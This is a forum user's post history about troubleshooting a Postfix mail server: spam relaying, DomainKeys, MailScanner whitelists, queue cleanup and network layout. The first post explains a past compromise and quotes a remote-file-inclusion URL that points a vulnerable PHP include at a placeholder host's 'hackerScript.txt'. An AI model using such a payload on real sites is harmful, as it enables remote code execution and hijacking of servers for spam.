顯示文章

這裡允許您檢視這個會員的所有文章。請注意, 您只能看見您有權限閱讀的文章。


文章 - denise

頁: [1] 2 3 4
1
請問一下您的 .htaccess 是怎麼設定的呢? 能否提供一下範例,感謝!!
我也遇到相同的問題,網站的程式必須要啟用 Register_global ,但基於安全性還是想把他關掉...

前兩天由於自己家中的主機怪怪得,所以做了一些檢查,赫然發現一堆不知道從那出來的 Email 再寄送,當下嚇到怕變成 SPAM 的木馬!∼

詳細檢查後發現主要是由 Register_global 開啟加上 require_once 沒有確認路徑變數的關係,導致被 spam 在 /tmp 下塞入了一個 script 自動發信!

該段語法如下 (xxxx.inc.php):

require_once $baseDir."include_once/adodb....";

主要就是在於沒有檢查 $baseDir 的位置與內容,且開啟了 register_global 的關係,所以可以直接採用:

http://xxxx.xxxx.xxxx/include_base/init_database.php?baseDir=http://xxxx.xx.xxx/hackerScript.txt; .....等。

原來 include_base 應該是給 /index.php 來 include 後使用的,而非給 client 存取的,所以讓使用者可以直接存取造成了安全上得隱憂。

另外 $baseDir 又容由另外一個檔案進行設定,所以 init_database.php 並沒有檢查該變數的內容。

基本上這種問題若是有關閉 register_global 就不會發生囉,不過由於原來的系統上有一些程式需求要 register_global = on 才能使用,所以才會這樣設定。

剛剛查過網路上,相類似的情況可以在預設 php.ini 為 register_global = off ,而在 .htaccess 設定 PHPINI 來改變特定目錄下的特性。

anyway,現在把東西重新調整過也把被偷發的垃圾信都刪掉了,希望以後不會再次發生這樣的問題了。

2

你跑那程式是前景模式運作,請自行執行時補上 & 符號跑背景即可,該程式會繼續執行不會結束。

代碼: [選擇]
program ....... &
不過你可能要放一份命令於 /etc/rc.local 內開機時後啟動。

謝謝大大的回覆... 雖然我想這並不是最佳的解決方式,我仍不知道我的安裝過程中錯在什麼地方... 也仍不知道哪個過濾器才是真正可以通用雅虎簽章...
照著您的建議,我把/etc/init.d/dkfilter 檔案改成了...
代碼: [選擇]
killall -1 dkfilter.in
killall -1 dkfilter.out

dkfilter.out --keyfile=/usr/local/dkfilter/private.key --selector=postfix --domain=abc.com.tw --method=nofws 127.0.0.1:10027 127.0.0.1:10028 &
dkfilter.in 127.0.0.1:10025 127.0.0.1:10026 &

算是暫時解決了目前遇到的問題,但是我的郵件仍舊沒有出現我所加註的金鑰...Orz,怎麼會這麼難搞啊@@~

3
在這裡只有看到sendmail版的DomainKey~ 我雖然有找到for postfix版的教學,可是怎麼試都失敗~不曉得有沒有裝成功的大大可以指點一下@@"

RHEL Linux 4 + postfix-2.3.4-0.2.el4

我試著參考這篇文章去安裝dkfilter這個過濾器,但是仍舊失敗...
http://jason.long.name/dkfilter/

現在已經有點搞糊塗了,到底該裝哪個才是對的呢? (dk-filter or dkfilter or dkim-filter??)
照著那個網頁安裝的時候出現了幾個問題...
代碼: [選擇]
# ./dkfilter.in 127.0.0.1:10025 127.0.0.1:10026(不知什麼原因,我在執行上面這條命令後,CMD視窗就停住了,但是netstat裡面有看到10025 & 10026,必須按Ctrl+C才能跳出,且跳出後我的netstat就只剩下10026開著...)

代碼: [選擇]
# ./dkfilter.out --keyfile=/usr/local/dkfilter/private.key --selector=postfix --domain=abc.com.tw --method=nofws 127.0.0.1:10027 127.0.0.1:10028(不知什麼原因,我在執行上面這條命令後,CMD視窗就停住了,但是netstat裡面有看到10027 & 10028,必須按Ctrl+C才能跳出,且跳出後我的netstat就只剩下10028開著...)

init-script.sh這個檔案在複製為/etc/init.d/dkfilter 執行後會出現錯誤,好像是因為裡面有用到Suse的語法關係,所以無法執行... (startproc... killproc...)

防火牆是否需要開放 10025~10028這四個port? 若需要的話,請問是該開UDP或TCP或是兩者都開?

我的DNS裡面貼的內容為下,請問這樣寫OK嗎? 因為教學網頁寫的不是很清楚,所以很怕寫錯...
代碼: [選擇]
_domainkey.abc.com.tw IN TXT "t=y; o=-;"
postfix._domainkey.abc.com.tw IN TXT "g=; k=rsa; p=MIGfMA0GC...後面太長省略...;"

4
Network 討論版 / mailq遺失收件人位置...
« 於: 2010-11-17 14:08 »
#mailq
14F9C73C06F     7087 Tue Nov 16 18:02:44  apache@abc.com.tw

0D99673C096!    1331 Wed Nov 17 13:55:45  apache@abc.com.tw
                                         denise@abc.com.tw

請問大大們,我在14F9C73C06F信件中查看郵件內容是有看到檔頭裡面有顯示收件人位置(To: denise@yahoo.com.tw),但mailq卻無法取用,是否有什麼辦法可以讓我補上收件人的郵件到裡面呢?
代碼: [選擇]
> postcat -q 14F9C73C06F
*** ENVELOPE RECORDS maildrop/14F9C73C06F ***
message_size:            7087             739               3               0
message_arrival_time: Tue Nov 16 18:02:44 2010
sender: apache@abc.com.tw
create_time: Tue Nov 16 18:02:44 2010
named_attribute: rewrite_context=remote
named_attribute: log_client_name=store.test.com.tw
named_attribute: log_client_address=123.123.123.123
named_attribute: log_message_origin=store.test.com.tw[123.123.123.123]
named_attribute: log_helo_name=abc.com.tw
named_attribute: log_protocol_name=ESMTP
named_attribute: client_name=store.test.com.tw
named_attribute: reverse_client_name=store.test.com.tw
named_attribute: client_address=123.123.123.123
named_attribute: helo_name=abc.com.tw
named_attribute: client_address_type=2
named_attribute: dsn_orig_rcpt=rfc822;purchase@abc.com.tw
original_recipient: purchase@abc.com.tw
done_recipient: purchase@abc.com.tw
named_attribute: dsn_orig_rcpt=rfc822;purchase@abc.com.tw
original_recipient: purchase@abc.com.tw
done_recipient: purchase_bak@abc.com.tw
named_attribute: dsn_orig_rcpt=rfc822;tony@abc.com.tw
original_recipient: tony@abc.com.tw
done_recipient: tony@abc.com.tw
*** MESSAGE CONTENTS maildrop/14F9C73C06F ***
Received: from abc.com.tw (store.test.com.tw [123.123.123.123])
by mail.abc.com.tw (Postfix) with ESMTP id A7DE473C08B;
Tue, 16 Nov 2010 18:02:44 +0800 (CST)
Received: by abc.com.tw (Postfix, from userid 48)
id EB2A02E5780; Tue, 16 Nov 2010 17:01:03 +0800 (CST)
To: denise@yahoo.com.tw
Subject: test mail
MIME-Version: 1.0
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: PHP Mailer
Content-Type: text/html; charset=big5
From: abc<purchase@abc.com.tw>
Message-Id: <20101116090103.EB2A02E5780@abc.com.tw>
Date: Tue, 16 Nov 2010 17:01:03 +0800 (CST)
X-JMAG.COM.TW-MailScanner-Information: Please contact the ISP for more information
X-MailScanner-ID: A7DE473C08B.A9E93
X-JMAG.COM.TW-MailScanner: Found to be clean
X-JMAG.COM.TW-MailScanner-From: apache@abc.com.tw
MailScanner-NULL-Check: 1290506592.8071@2jDvnrdFMYKzbPE+H1kUMg
X-Spam-Status: No

5
我把main.cf改成這樣後,終於停止了.... Orz


/etc/postfix/main.cf :(紅色為修正後的差異處...),另將smtpd_client_restrictions的幾個半形逗點給移除掉了,直接用空格代替~

smtpd_recipient_restrictions = permit_sasl_authenticated permit_auth_destination permit_mynetworks reject_invalid_hostname reject_non_fqdn_hostname reject_unknown_sender_domain reject_non_fqdn_sender reject_non_fqdn_recipient reject_unknown_recipient_domain reject_unauth_pipelining reject_unauth_destination permit permit_inet_interfaces  reject_unknown_reverse_client_hostname

smtpd_client_restrictions = permit_sasl_authenticated reject_rbl_client relay.ordb.org permit_mynetworks check_client_access hash:/etc/postfix/access reject_unknown_client permit_inet_interfaces reject_unknown_reverse_client_hostname

代碼: [選擇]
Oct 23 05:07:19 mail postfix/smtpd[11573]: NOQUEUE: reject: RCPT from 200.175.3.136.static.gvt.net.br[200.175.3.136]: 554 5.7.1 <lee.ruey@gmail.com>: Relay access denied; from=<monicatsu@cm1.hinet.net> to=<lee.ruey@gmail.com> proto=SMTP helo=<200.175.3.136.static.gvt.net.br>

Oct 23 05:07:19 mail postfix/smtpd[11618]: NOQUEUE: reject: RCPT from unknown[201.65.225.248]: 540 5.7.1 Client host rejected: cannot find your hostname, [201.65.225.248]; from=<rqmrevs@googlegroups.com> to=<lu8310kimo@yahoo.com.tw> proto=SMTP helo=<ATEMSERVIDOR>




6
為什麼會有你說的情形? 答案都在你自己機器上的 log 裡頭.
自己不會看 log 的話, 就去請一個會看的人吧.... 或... 不要自己弄, 直接把 email 給別人代管吧.




拜託大大~~請指點一下這段LOG的問題點出在哪 m(_ _)m
感激不盡@@~ 我真的很想把MAIL主機學好! (所以我就算安裝了驗證的機制,仍舊擋不了這些廣告信進來發信,這是我Relay沒關好的關係嗎?)

每次遇到啥問題去查G大神,然後傻傻的看人家說要裝啥就去裝啥,搞到後面我都不知道自己的主機到底是用哪個機制在管理收發信了>"<

7
不是反查到來源 dynamic 都直接退嗎?
怎麼是 dynamic 還進的去...

我也不確定為廣告信什麼可以進來發送... 我是用Cyrus-sasl + courier-authlib這個在處理驗證的...@@~

/etc/postfix/main.cf
代碼: [選擇]
smtpd_client_restrictions = permit_sasl_authenticated,reject_rbl_client relay.ordb.org,permit_mynetworks, check_client_access hash:/etc/postfix/access, reject_unknown_client

smtpd_recipient_restrictions = permit_sasl_authenticated permit_auth_destination permit_mynetworks reject_invalid_hostname reject_non_fqdn_hostname reject_unknown_sender_domain reject_non_fqdn_sender reject_non_fqdn_recipient reject_unknown_recipient_domain reject_unauth_pipelining reject_unauth_destination permit reject_unknown_reverse_client_hostname


/etc/postfix/access 有加入這段:
代碼: [選擇]
#檔除動態IP網段來的廣告信件
dynamic.apol.com.tw     REJECT  We can't allow dynamic IP to relay!
dynamic.giga.net.tw     REJECT  We can't allow dynamic IP to relay!
dynamic.hinet.net       REJECT  We can't allow dynamic IP to relay!
dynamic.seed.net.tw     REJECT  We can't allow dynamic IP to relay!
dynamic.tfn.net.tw      REJECT  We can't allow dynamic IP to relay!
dynamic.ttn.net         REJECT  We can't allow dynamic IP to relay!
dynamic.lsc.net.tw      REJECT  We can't allow dynamic IP to relay!


8
昨晚又看到幾萬封出現了=  =" 我好命苦...Orz

這次情況是浮動IP的攻擊,還會不斷變更發信MAIL~~

綠色文字是我自己主機的資訊,確定是沒錯的,寄件者全都是用 亂數+GMAIL信箱來發信,我不懂為何主機可以讓不認識的郵件進來發信,而且還是使用白名單權限,猜想應該是由 mail.abc.com.tw 直接寄出的關係,但是124-9-128-133.dynamic.tfn.net.tw [124.9.128.133]這個IP又是用何種方式登入我的主機呢?
為什麼主機沒有強制要求對方先驗證就允許寄信呢? >"<

LOG:
寄件者:   wyrdnifwe@gmail.com
Received: by mail.abc.com.tw (Postfix, from userid 103) id 40098A93727; Thu, 21 Oct 2010 22:08:45 +0800 (CST) Received: from 123.123.123.123 (124-9-128-133.dynamic.tfn.net.tw [124.9.128.133]) by mail.abc.com.tw (Postfix) with SMTP id 1D06EAAB461; Thu, 21 Oct 2010 22:08:43 +0800 (CST) Received: from hbxmngzw.yahoo.com.tw (hbxmngzw.yahoo.com.tw [227.232.24.215]) by with SMTP id ge2AF8Wq6810; Thu, 21 Oct 2010 10:49:33 -0300 Message-ID: Date: Thu, 21 Oct 2010 06:53:33 -0700 From: "Yahoo!奇摩拍賣" Reply-To: "Yahoo!奇摩拍賣" To: 收件MAIL1, 收件MAIL2 Subject: BVLGARI 新款*-彩鑽手鍊*免運費*三件8折- Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="--NextPart_5x8_wypr_gz2bpykyj88gq39e"

9
個人淺見:
小弟的centos+snedmail+spamassassin
然後再加上procmail,procmail是用鳥哥的procmailrc,
不知道您的mail server有無啟用procmail功能呢?


我只有Mailscanner + Spamassassion,沒有再裝 procmail
我比較納悶的是主機內並沒有mpba這個帳號,為什麼還能用我的MX來寄信?
docvot也有啟用...

10
你確定你還是root嗎? 先換個密碼看看吧

還有去 /tmp 裡面看看,有沒有多出奇怪的檔案吧

記得要檢查特殊權限喔


已經變更ROOT密碼
/tmp裡面這些東西應該可以直接刪除吧?

代碼: [選擇]
ls -l /tmp
total 748
drwxr-xr-x  2 root   root     4096 Jul 11 00:00 backup-config-manifests
srwxrwxrwx  1 root   root        0 Dec 12  2009 clamd.socket
-rw-------  1 apache apache      0 Jul 13 16:30 sess_2daba4c91186d6f51ab45a3bbd4b7af1
-rw-------  1 apache apache     99 Jul 13 15:11 sess_778f86effd2429bd6645f596d8f67fae
-rw-------  1 apache apache     99 Jul 13 15:10 sess_ab7cb35220f1b35b948a3335e37210a8
-rw-------  1 apache apache    210 Jul 12 19:55 sess_b083410804f07e0606dfa5c7b10e434a
-rw-------  1 apache apache      0 Jul 13 17:38 sess_ef4a0b5a3942599475bf09c5d3523b00
-rw-------  1 apache apache 740803 Jul 13 18:22 sess_f6a31833c610205fe0edcf608a24159a
-rw-------  1 apache apache     99 Jul 13 15:10 sess_f8c902346b37258da59d2d18e54f99f0

11
小弟淺見:
您提到可能是內部的問題,小弟建議您,內部mua暫時不開放使用,直接請user使用webmail方式,
先排除是否為內部client在亂發信。
如果真的是內部的問題,建議內部有問題的pc重灌。
不知貴單位mua是用outlook還是什麼軟體給client使用,
通訊錄可先加入@,讓統一發信的狀況先停止。
個人淺見。

請問有沒有什麼辦法,可以讓系統只要一看到"mpba@mail.abc.tw"這個MAIL,不管是收信還是寄出都一律刪除或是拋棄不處理?

12
我已經設了210.32.137.42到iptables了,但他還是會變IP~~
請問這個情況是不是表示,對方是直接由我的本機發送,所以不用經過認證?
這樣的話,應該是有木馬囉?

那麼肉腳的攻擊者,連來源ip都沒清掉或是偽造,99%是不懂的小公司或是個人用固定ip被入侵當跳板
至於你自己的系統,先管好吧,也有很大的可能性,root已經換人做做看了

救命啊~ 他又來了@@
一樣是用同一個MAIL帳號進來發信,在/etc/postfix/access寫REJECT也擋不掉它嗎? Orz
ROOT身分還在~ 這是我的LOG...

代碼: [選擇]
Jul 13 14:56:56 mail postfix/smtpd[16519]: NOQUEUE: reject: RCPT from unknown[210.32.137.42]: 554 5.7.1 <stan_lonely@yahoo.com.tw>: Relay access denied; from=<mpba@mail.abc.tw> to=<stan_lonely@yahoo.com.tw> proto=ESMTP helo=<888tiger-048c6b>
Jul 13 14:56:57 mail postfix/smtpd[18133]: connect from unknown[61.184.26.212]
Jul 13 14:56:57 mail postfix/pickup[6054]: 31C3973E1B6: uid=103 from=<> orig_id=39DC173DD7A
Jul 13 14:56:57 mail postfix/cleanup[21853]: 31C3973E1B6: hold: header Received: by mail.abc.com.tw (Postfix, from userid 103)??id 31C3973E1B6; Tue, 13 Jul 2010 09:57:52 +0800 (CST) from local; from=<> to=<mpba@abc.jmag.tw>
Jul 13 14:56:57 mail postfix/cleanup[21853]: 31C3973E1B6: message-id=<20100713015752.39DC173DD7A@mail.abc.com.tw>
Jul 13 14:56:57 mail postfix/smtpd[16519]: NOQUEUE: reject: RCPT from unknown[210.32.137.42]: 554 5.7.1 <stan_matsu@yahoo.com.tw>: Relay access denied; from=<mpba@abc.jmag.tw> to=<stan_matsu@yahoo.com.tw> proto=ESMTP helo=<888tiger-048c6b>


小弟淺見:
請問您有提到兩組ip,210.32.137.42  及61.184.26.212,直接擋掉不行嗎?


13
那麼肉腳的攻擊者,連來源ip都沒清掉或是偽造,99%是不懂的小公司或是個人用固定ip被入侵當跳板
至於你自己的系統,先管好吧,也有很大的可能性,root已經換人做做看了

救命啊~ 他又來了@@
一樣是用同一個MAIL帳號進來發信,在/etc/postfix/access寫REJECT也擋不掉它嗎? Orz
ROOT身分還在~ 這是我的LOG...

代碼: [選擇]
Jul 13 14:56:56 mail postfix/smtpd[16519]: NOQUEUE: reject: RCPT from unknown[210.32.137.42]: 554 5.7.1 <stan_lonely@yahoo.com.tw>: Relay access denied; from=<mpba@mail.abc.tw> to=<stan_lonely@yahoo.com.tw> proto=ESMTP helo=<888tiger-048c6b>
Jul 13 14:56:57 mail postfix/smtpd[18133]: connect from unknown[61.184.26.212]
Jul 13 14:56:57 mail postfix/pickup[6054]: 31C3973E1B6: uid=103 from=<> orig_id=39DC173DD7A
Jul 13 14:56:57 mail postfix/cleanup[21853]: 31C3973E1B6: hold: header Received: by mail.abc.com.tw (Postfix, from userid 103)??id 31C3973E1B6; Tue, 13 Jul 2010 09:57:52 +0800 (CST) from local; from=<> to=<mpba@abc.jmag.tw>
Jul 13 14:56:57 mail postfix/cleanup[21853]: 31C3973E1B6: message-id=<20100713015752.39DC173DD7A@mail.abc.com.tw>
Jul 13 14:56:57 mail postfix/smtpd[16519]: NOQUEUE: reject: RCPT from unknown[210.32.137.42]: 554 5.7.1 <stan_matsu@yahoo.com.tw>: Relay access denied; from=<mpba@abc.jmag.tw> to=<stan_matsu@yahoo.com.tw> proto=ESMTP helo=<888tiger-048c6b>

14
Network 討論版 / MAIL被奇怪的方式入侵
« 於: 2010-07-08 20:15 »
前天發現Mail Queue突然暴增到幾萬封,一查之下發現有個奇怪的帳號一直在主機裏面發送垃圾信
該帳號使用的是公司內部的網域,但這個帳號本身並不存在 mpba@mail.abc.tw,不曉得他是用什麼方式變成我的USER??
IP已經查到都是用固定IP: 218.170.41.92 (查詢是中華的IP,可以去向他們投訴該IP嗎? 還是找網路警察備案?)
mail.abc.tw 是公司的MX,我們公司的員工都是用xxx@abc.tw在收發信的,所以突然跑出個mpba@mail.abc.tw就很明顯異常~
我不知道我這樣處理夠不夠完善,請問各位大大會怎麼做呢?

我有先將/etc/postfix/header_checks改成

代碼: [選擇]
/^From:.mpba\@mail\.abc\.tw/ DISCARD Attack Mail
/^Received:/ HOLD

然後在/etc/postfix/access裡面加入
代碼: [選擇]
218.170.41.92   REJECT
mpba@mail.abc.tw       REJECT

最後再下這指令把Mail Queue清掉... 但是很慢很慢... 殺不完的感覺
代碼: [選擇]
mailq | grep "mpba@mail.abc.tw" | cut -d " " -f1 | cut -d'*' -f1 | postsuper -d -

15
我是安裝postfix版本的:
1.SASL
2.Clamv
3.Spamassassin
4.Mailscanner
5.MailWatch
6.dovecot

請問檢察認證是否有啟用是不是只要telnet localhost 25就可以看見了? (250-AUTH LOGIN PLAIN)
代碼: [選擇]
[root@mail log]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 mail.jmag.com.tw ESMTP "Version not Available"
ehlo localhost
250-mail.jmag.com.tw
250-PIPELINING
250-SIZE 51200000
250-VRFY
250-ETRN
250-AUTH LOGIN PLAIN
250-AUTH=LOGIN PLAIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

若是帳號被盜的話,那也應該是顯示我的網域吧,但這些廣告信均是*@gmail.com寄出的

看樣子,你沒有裝 TLS,沒有強迫使用 TLS,有可能帳號密碼被看光光。密碼被看到或猜到就能用那帳號寄信出去了。最好你的 mail log 能記錄使用 smpt 送信的 user 帳號。

請問要強迫使用TLS的設定是不是在postfix裡面設 smtp_tls_auth_only = yes ?


我加入TLS後使用Microsoft Office Outlook設為使用TLS驗證是可以寄信的,但使用Outlook Express設為使用SSL收信時卻會出現錯誤...
伺服器不支援SSL連線。
通訊協定: SMTP,伺服器回應: '250 DSN',連接埠: 25,安全(SSL): 是,伺服器錯誤: 250,錯誤碼: 0x800CCC7D
請問該如何設定才能讓Outlook Express可以正常寄信呢?


已找到原因了... 因為我PC上的防毒軟體avast不支援TLS... 關掉防毒後就可以寄信了... Orz

16
請問有沒有什麼指令可以一次就將*.dynamic.tfn.net.tw這個寄件者的MAILQ通通刪除呢?
已經被塞了五萬多封在裡面,動彈不得@@~

17
你有用 SASL + TLS 嗎?你的 mail log 看不到 sasl_method,是否不用認證也可以寄?(可是你說又測過沒有 open relay) 另一個原因是否有人的帳號密碼被猜到了,spammer 用那帳號寄。

感謝回覆!!

我是安裝postfix版本的:
1.SASL
2.Clamv
3.Spamassassin
4.Mailscanner
5.MailWatch
6.dovecot

請問檢察認證是否有啟用是不是只要telnet localhost 25就可以看見了? (250-AUTH LOGIN PLAIN)
代碼: [選擇]
[root@mail log]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 mail.jmag.com.tw ESMTP "Version not Available"
ehlo localhost
250-mail.jmag.com.tw
250-PIPELINING
250-SIZE 51200000
250-VRFY
250-ETRN
250-AUTH LOGIN PLAIN
250-AUTH=LOGIN PLAIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

若是帳號被盜的話,那也應該是顯示我的網域吧,但這些廣告信均是*@gmail.com寄出的

18
在mailq裡面總是塞滿了幾千封的信件,而且寄件者跟收信者均不是我們主機內的帳號... 造成主機正常帳號無法順利收發信件...
請問該怎麼樣檢查是哪裡的設定出了問題呢??

我在http://spam.gsnmm.gov.tw/cgi-bin/relayall.cgi的網頁上測試Open Relay是顯示:很好,有拒絕relay.
主機也有設定認證AUTH

下面是我列出其中一封郵件檔頭的內容:
(211.78.82.201是我的郵件主機IP,但該IP後面括號中的124.11.145.37是我不認識的IP...且寄件者均是來自gmail,然後內容全都是這類垃圾廣告信,收件者也是一長串的其他網域的使用者...)

收信時間:   17/02/10 02:01:50
收信主機:   mail.jmag.com.tw
上層主機IP:   124.11.145.37

郵件路由:   
IP / 主機名稱 / 國家
124.11.145.37 / 124-11-145-37.dynamic.tfn.net.tw / Taiwan
175.100.143.36 / (Reverse Lookup Failed) / India

ID:   AF0BF73C414.A968C
郵件檔頭:   Received: from 211.78.82.201 (124-11-145-37.dynamic.tfn.net.tw [124.11.145.37]) by mail.jmag.com.tw (Postfix) with SMTP id AF0BF73C414; Wed, 17 Feb 2010 00:52:11 +0800 (CST) Received: from dns0.yahoo.com.tw (dns0.yahoo.com.tw [175.100.143.36]) by with Microsoft SMTPSVC(5.0.2195.6824); Thu, 10 Jan 2002 21:56:32 -0100 Message-ID: Date: Fri, 11 Jan 2002 02:55:32 +0400 From: "Yahoo!奇摩拍賣" Reply-To: "Yahoo!奇摩拍賣" To: sh_mei0208@yahoo.com.tw, n53390187@yahoo.com.tw, met_992000@yahoo.com.tw, isabella1007@yahoo.com.tw, roda0529@yahoo.com.tw, sai90140@yahoo.com.tw, shiweich@yahoo.com.tw, hyde5236@yahoo.com.tw, old506.tw@yahoo.com.tw, rebeca725@yahoo.com.tw, o1b3033@yahoo.com.tw, play4917@yahoo.com.tw, qq780813@yahoo.com.tw, sing00136@yahoo.com.tw, m8279999@yahoo.com.tw, angel1995118@yahoo.com.tw Subject: DTC廣告經典款*純銀八心八箭美鑽項鍊*免運費 Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="--NextPartt_vq_oiqj_y_tuxpl8hq17n0kqe"
寄件者:   nruass@gmail.com
收件者:   sing00136@yahoo.com.tw,sai90140@yahoo.com.tw,rebeca725@yahoo.com.tw,met_992000@yahoo.com.tw,m8279999@yahoo.com.tw,roda0529@yahoo.com.tw,play4917@yahoo.com.tw,isabella1007@yahoo.com.tw,o1b3033@yahoo.com.tw,old506.tw@yahoo.com.tw,shiweich@yahoo.com.tw,hyde5236@yahoo.com.tw,n53390187@yahoo.com.tw,sh_mei0208@yahoo.com.tw,qq780813@yahoo.com.tw,angel1995118@yahoo.com.tw
主旨:   DTC廣告經典款*純銀八心八箭美鑽項鍊*免運費
大小:   3679

列出此IP 124.11.145.37在maillog的信件內容:

Feb 17 03:13:29 mail postfix/cleanup[16354]: 3A13D73C3A8: hold: header Received: from 211.78.82.201 (124-11-145-37.dynamic.tfn.net.tw [124.11.145.37])??by mail.jmag.com.tw (Postfix) with SMTP id 3A13D73C3A8;??Wed, 17 Feb 2010 03:13:29 +0800 (CST) from 124-11-145-37.dynamic.tfn.net.tw[124.11.145.37]; from=<rcgnu@gmail.com> to=<g751216@yahoo.com.tw> proto=SMTP helo=<211.78.82.201>
Feb 17 03:13:30 mail postfix/smtpd[13019]: 53B9273C3B1: client=124-11-145-37.dynamic.tfn.net.tw[124.11.145.37]
Feb 17 03:13:30 mail postfix/cleanup[16792]: 53B9273C3B1: hold: header Received: from 211.78.82.201 (124-11-145-37.dynamic.tfn.net.tw [124.11.145.37])??by mail.jmag.com.tw (Postfix) with SMTP id 53B9273C3B1;??Wed, 17 Feb 2010 03:13:30 +0800 (CST) from 124-11-145-37.dynamic.tfn.net.tw[124.11.145.37]; from=<houhcirpykzp@gmail.com> to=<fmyang7777@yahoo.com.tw> proto=SMTP helo=<211.78.82.201>
Feb 17 03:13:31 mail postfix/smtpd[13019]: 3B91173C3BE: client=124-11-145-37.dynamic.tfn.net.tw[124.11.145.37]
Feb 17 03:13:31 mail postfix/cleanup[16354]: 3B91173C3BE: hold: header Received: from 211.78.82.201 (124-11-145-37.dynamic.tfn.net.tw [124.11.145.37])??by mail.jmag.com.tw (Postfix) with SMTP id 3B91173C3BE;??Wed, 17 Feb 2010 03:13:31 +0800 (CST) from 124-11-145-37.dynamic.tfn.net.tw[124.11.145.37]; from=<txilm@gmail.com> to=<f129095070@yahoo.com.tw> proto=SMTP helo=<211.78.82.201>
Feb 17 03:13:32 mail postfix/smtpd[13019]: disconnect from 124-11-145-37.dynamic.tfn.net.tw[124.11.145.37]

19
把自己列在 /etc/Mailscanner/rules 底下的 spam.whitelist.rules 裡面,例如:
代碼: [選擇]
#From:          152.78.         yes
#From:          130.246.        yes
#From:          domain_name
#FromOrTo:      default         no

感謝日京大大的回覆,但我以為加上#的符號是表示忽略不用的意思? 是我會錯意嗎?
我目前的spam.whitelist.rules設定如下,不知是否有錯呢?
代碼: [選擇]
#From:          152.78.         yes
#From:          130.246.        yes
From:           *@*.abc.com yes
From:           *@abc.com   yes
From:           192.168.1         yes
From:           *@localhost        yes
From:           127.0.0.1        yes

FromOrTo:       default         no
我的白名單只有在寄送這般大量信件時(50封)才會出現評分問題,我測試過若一次寄個10封以內的密件副本都是正常,直接以白名單身分寄出...
請問我還該提供什麼LOG方便偵錯呢?

20
請問各位大大,我的系統是使用Postfix,Mailscanner,Spamassasin, MailWatch,然後利用Relay的方式來送信

因為MailWatch會將我的黑白名單改成用MySQL來管理
我都是直接用網域來設定白名單內容...
EX: INSERT INTO `whitelist` VALUES (8, 'default', '', 'abc.com');

目前測試上都會出現白名單,所以不會被評分
但問題是當我用同個MAIL用密件副本寄給50人的時候,Mailscanner居然就會開始評分,並且判斷我的MAIL內容為垃圾信,然後無論如何就收不到信了...
請教大大我該怎麼排除這個問題呢? 我希望我的信不要被掃瞄或是評分...

maillog:
Feb  4 18:11:30 mail postfix/pickup[23142]: 7975073C03F: uid=48 from=<apache>
Feb  4 18:11:30 mail postfix/cleanup[23891]: 7975073C03F: hold: header Received: by mail.abc.com (Postfix, from userid 48)??id 7975073C03F; Thu,  4 Feb 2010 18:11:30 +0800 (CST) from local; from=<apache@abc.com>
Feb  4 18:11:30 mail postfix/cleanup[23891]: 7975073C03F: message-id=<20100204101130.7975073C03F@mail.abc.com>
Feb  4 18:12:27 mail MailScanner[28819]: Logging message 7975073C03F.A5237 to SQL
Feb  4 18:12:27 mail MailScanner[28782]: 7975073C03F.A5237: Logged to MailWatch SQL

MailWatch log:
Spam報表:   
分數   合乎的規則   說明   notcached   
   分數=9.527   
6   被需要   
4.00   FROM_ILLEGAL_CHARS   From: has too many raw illegal characters
0.00   HTML_MESSAGE   HTML included in message
1.05   HTML_MIME_NO_HTML_TAG   HTML-only message, but there is no HTML tag
1.67   MIME_HTML_ONLY   Message only has text/html MIME parts
-0.00   NO_RELAYS   Informational: message was not relayed via SMTP
1.28   SUBJECT_NEEDS_ENCODING   
1.53   SUBJ_ILLEGAL_CHARS   Subject: has too many raw illegal characters

21

可以的話請盡量分開,或者是你可以買 switch 切 vlan 就不需要用一堆 hub 了:)

我剛剛去問過IDC了,我們之前有放一台Dlink L2的switch,現在是有7條線在上面(6條來自我的三台主機,1條對外)
我不知道這台switch有沒有支援vlan,若沒有的話,有建議的採購清單嗎? 我再向公司申請採購
請問我該怎麼向IDC的管理人員說明我的需求,他如果問我該怎麼做的話,我可以去哪找給他參考的實做文件?

我上網翻了一下switch vlan看得我霧薩薩... 僅知道她是一種虛擬網路的劃分機制
但實際上要做的方式我看不太懂,也不清楚自己該適用哪種方式...(tagged /Untagged, VID...)

主機A:WEB SERVER;主機B:MAIL SERVER;主機C:MySQL SERVER
三台都有自己的獨立IP,且都有另外裝一張網卡設192.168.1.0/24

22

這樣混合在一個實體區段上,封包都跑在一起沒有區隔。這樣網路當然還會通,個人使用應該無所謂。

若是實際在公司單位等環境不可以這樣用,因為這個有安全的議題。

這是在公司的環境下的@@
一共有三台主機,每台都有兩張網卡,然後通通塞在同台HUB上...
請問是不是該再買一台HUB,然後把對外連線移過去新HUB上,再拉一條線連到舊HUB上呢?
或是有其它的方式解決?

23
引用
另外,最近在主機的message.log裡也看到大量的 kernel: martian source...火星連線
去Google上查看了大家都說這不要緊,可以省略掉不看

那就是您網路架構問題,比方你把兩張網卡不同網段的環境串在同一個 hub 上,那就會有該訊息顯示。

我的主機上有兩張網卡,一個是IDE給的對外網路,一個是想讓他跟其它主機走虛擬IP的
請問是否我應該去問IDE他們,能否不要把對外網路線接在HUB上,或是這其實是很正常的做法,可以不用改?

24
Linux 討論版 / 主機被DdoS攻擊了該怎辦?
« 於: 2009-10-10 15:24 »
雖然不是很確定,但是攻擊方式很類似,我不確定這兩台主機是不是被植入惡意程式
但最近在http的error.log內看到一堆不認識的IP在開啟網站中不存在的RAR或ZIP壓縮檔(主機A),不然就是不存在的網頁或圖檔、資料夾(主機B)
導致整個網站的速度被拖慢,甚至被癱瘓掉,雖然有裝上mod_evasive,但也只是讓對方提早自動更換IP,攻擊行為仍舊很密集不間段...

其中比較令我不解的是下面這段LOG,他的referer網址點下去居然是帶進我的MSN帳號的畫面,而且是已登入(但我明明就有乖乖登出了)!?
我很怕自己是不是因為手賤去點這個網址,而導致自己的MSN帳號被盜~ 但就算被盜了,也不該出現在這主機呀...
希望大家別像我笨笨亂點下去,或是有大大可以告訴我這連結是不是安全的,在不確定是否安全前~ 還是看看就好XD

代碼: [選擇]
